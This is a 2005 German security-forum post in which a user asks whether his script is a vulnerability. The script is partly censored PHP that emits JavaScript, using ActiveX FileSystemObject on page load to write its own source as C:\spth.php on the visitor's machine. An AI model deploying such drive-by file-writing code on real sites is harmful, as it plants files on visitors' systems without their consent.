Zurück   Trojaner-Board > Web/PC > Alles rund um Windows

Alles rund um Windows: PHP Sicherehitslücke?

Windows 7 Hilfe zu allen Windows-Betriebssystemen: Windows XP, Windows Vista, Windows 7, Windows 8(.1) und Windows 10 / Windows 11- als auch zu sämtlicher Windows-Software. Alles zu Windows 10 ist auch gerne willkommen. Bitte benenne etwaige Fehler oder Bluescreens unter Windows mit dem Wortlaut der Fehlermeldung und Fehlercode. Erste Schritte für Hilfe unter Windows.

Antwort
Alt 11.02.2005, 00:39   #1
snooby
 
PHP Sicherehitslücke? - Standard

Problem: PHP Sicherehitslücke?



Hi!
Also, ich habe vor einiger Zeit einmal einen Script geschrieben, und damit kann man via Server auf die Daten des Clients zugreifen.

Ist das eine Sicherheitslücke oder soll das erlaubt sein?

Hier eine (zensierte) Ausgabe des PHP Codes:
PHP-Code:
<?
$nl
=chr(13).chr(10);
echo 
'<html><head>';
echo 
'<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 
'function go(){'.$nl;
echo 
'var fso=new 
ActiveXObject('
.chr(34).'Scripting.FileSystemObject'.chr(34).')'.$nl;
echo 
'var file=fso.CreateTextFile('.chr(34).'C:\\\spth.php'.chr(34).')'.$nl;
$cont=fread(fopen (__FILE__'r'),filesize(__FILE__));
$i=0;$nc='';
echo 
'file.Write(';
while (
$i<strlen($cont)){
echo 
'String.[ZENSIERT]Code('.ord($cont{ZENSIERT}).')+';
$i++;
}
echo 
chr(34).chr(34).')'.$nl;
echo 
'file.Close()}'.$nl;
echo 
'</script></head>';$nl.$nl;
?>
<body language="JavaScript" onload="ZENSIERT()"></body></html>
grüsse, Mario

Antwort

Themen zu PHP Sicherehitslücke?
clients, codes, daten, einiger, erlaubt, html, javascript, script, server, sicherehitslücke, sicherheitslücke, zugreife




Zum Thema PHP Sicherehitslücke? - Hi! Also, ich habe vor einiger Zeit einmal einen Script geschrieben, und damit kann man via Server auf die Daten des Clients zugreifen. Ist das eine Sicherheitslücke oder soll das - PHP Sicherehitslücke?...
Archiv
Du betrachtest: PHP Sicherehitslücke? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.